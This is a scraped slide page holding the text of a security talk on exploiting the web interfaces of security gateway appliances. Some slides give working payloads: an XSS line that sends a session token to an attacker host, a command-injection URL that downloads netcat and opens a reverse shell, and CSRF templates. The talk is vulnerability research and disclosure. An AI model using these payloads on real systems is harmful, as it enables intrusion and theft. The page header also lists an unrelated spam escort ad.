Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

  • 1. They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
  • 2. Introduction §  35+ Exploits found and reported to vendors of Security Gateways since October 2011 §  Many are serious issues which can lead an external attacker to compromise the Gateway §  Owning the Gateway can be quick, and powerful… as I will show you…
  • 3. Which kind of products? §  Security Gateways -  Multifunction Security Gateways -  Email and Web filtering §  Appliances and Software §  Some examples include: -  ClearOS, Untangle, McAfee, Proofpoint, Barracuda -  Websense, Symantec (Brightmail)
  • 4. How are they deployed?
  • 5. What do they look like? Screenshots removed for slides
  • 6. My Exploit Research method §  Find vendor site, sign-up §  Download product evaluation -  get eval-key (30 days) §  Install VM and snapshot §  “Blast it” with automated scanners §  Prod and poke it with Burp -  (majority of time) §  SSH as root for whitebox testing §  Create/test exploits §  Log and report exploits
  • 7. Common vulnerabilities found §  Input-validation issues (90% of products) -  XSS, command-injection, SQLi, parameter-tampering §  Predictable URLs & parameters = CSRF §  Excessive privileges §  Various session-management issues §  Authentication bypass and information- disclosure §  Out-of-date software, default configs/ content §  Brute force password guessing -  (too basic but lots of it)
  • 8. Attack stages §  Phase one: -  Gaining access to the UI §  Phase two: -  Gaining access to the operating- system
  • 9. Interesting examples 1 §  ClearOS -  Information disclosure
  • 12. Recap – UI ownage
  • 14. Recap – Root shell and pivoting
  • 15. Post exploitation §  It’s common for useful tools to be already installed -  gcc -  tcpdump -  netcat -  Nmap -  Perl/Python -  yum/apt-get -  stunnel §  File-system frequently not “hardened” -  No SELinux
  • 16. Other session-token disclosure Screenshots removed for slides
  • 17. More session-tokens – bypassing cookie security §  Bypass cookie security flags (Http-Only) §  Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= "http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + """)'>
  • 18. Attack scenarios §  Direct access to the Security Gateway UI -  Auth-bypass, session-hijacking, information-disclosure §  No direct access to the UI -  CSRF, XSS -  (Requires reconnaissance, and interaction with users) -  Special case of CSRF -  OSRF with out-of-band XSS
  • 19. CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
  • 20. CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
  • 21. CSRFing Corporate Security Gateways Attacker Victim
  • 22. Interesting examples 2 §  Websense -  Unauthenticated command-injection as SYSTEM -  Advanced CSRF
  • 23. Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo  .pdf%26echo  strUrl  %3d  ^"http:^"  %2b   chr(47)  %2b  chr(47)  %2b  ^"192.168.233.11^"  %2b  chr(47)  %2b  ^"nc.exe^">  http.vbs %26echo  StrFile  %3d  ^"nc.exe^"  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DEFAULT  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PRECONFIG  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DIRECT  %3d  1  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PROXY  %3d  2  >>  http.vbs%26echo  Dim  http,  varByteArray,   strData,  strBuffer,  lngCounter,  fs,  ts  >>  http.vbs%26echo      Err.Clear  >>  http.vbs %26echo      Set  http  %3d  Nothing  >>  http.vbs%26echo      Set  http  %3d   CreateObject(^"WinHttp.WinHttpRequest.5.1^")  >>  http.vbs%26echo      If  http  Is   Nothing  Then  Set  http  %3d  CreateObject(^"WinHttp.WinHttpRequest^")  >>  http.vbs %26echo      If  http  Is  Nothing  Then  Set  http  %3d   CreateObject(^"MSXML2.ServerXMLHTTP^")  >>  http.vbs%26echo      If  http  Is  Nothing   Then  Set  http  %3d  CreateObject(^"Microsoft.XMLHTTP^")  >>  http.vbs%26echo       http.Open  ^"GET^",  strURL,  False  >>  http.vbs%26echo      http.Send  >>  http.vbs%26echo     varByteArray  %3d  http.ResponseBody  >>  http.vbs%26echo      Set  http  %3d  Nothing  >>   http.vbs%26echo      Set  fs  %3d  CreateObject(^"Scripting.FileSystemObject^")  >>   http.vbs%26echo      Set  ts  %3d  fs.CreateTextFile(StrFile,  True)  >>  http.vbs%26echo       strData  %3d  ^"^"  >>  http.vbs%26echo      strBuffer  %3d  ^"^"  >>  http.vbs%26echo      For   lngCounter  %3d  0  to  UBound(varByteArray)  >>  http.vbs%26echo              ts.Write  Chr(255   And  Ascb(Midb(varByteArray,lngCounter  %2b  1,  1)))  >>  http.vbs%26echo      Next  >>   http.vbs%26echo      ts.Close  >>  http.vbs%26http.vbs%26nc.exe  192.168.233.11  443  -­‐e   cmd.exe|  
  • 24. But how to exploit it?
  • 25. Problems with CSRFing internal products from outside §  Who is the admin? §  How do you get the admin to click something malicious whilst logged- in? §  Product-UI port locked down to specific users? §  Don’t know internal IP address of the product in advance?
  • 26. Ways to find DMZ IP addresses §  From SMTP relays bounced messages §  Misconfigured Web servers
  • 27. CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...
  • 28. Use the browser (and proxy)
  • 29. There’s no place like localhost §  127.0.0.1 §  127.0.0.2 §  There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost
  • 33. Interesting examples 3 §  Proofpoint  (video/demo)   -­‐  Enumerate  email  addresses -­‐  OSRF  via  email  
  • 37. Recap – UI ownage via OSRF
  • 39. Conclusion §  Exploiting Security Gateway products offers powerful positions for an attacker §  Wide range of issues, some very serious -  Some easy to find, some harder §  Most techniques used are several years old §  I feel there is a big knowledge gap between secure website development and secure UI development
  • 40. Further research §  This is a rich area for exploit- development -  35+ Exploits found so far in Security Gateways (just takes time) -  Lots of similar products vulnerable to similar attacks §  Other types of product -  Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far -  I’ve started looking at SSL VPNs
  • 41. Questions and suggestions §  Whitepaper available at BlackHat EU §  Company Website: http://www.ngssecure.com §  Personal Blog: http://insidetrust.blogspot.com §  QUESTIONS?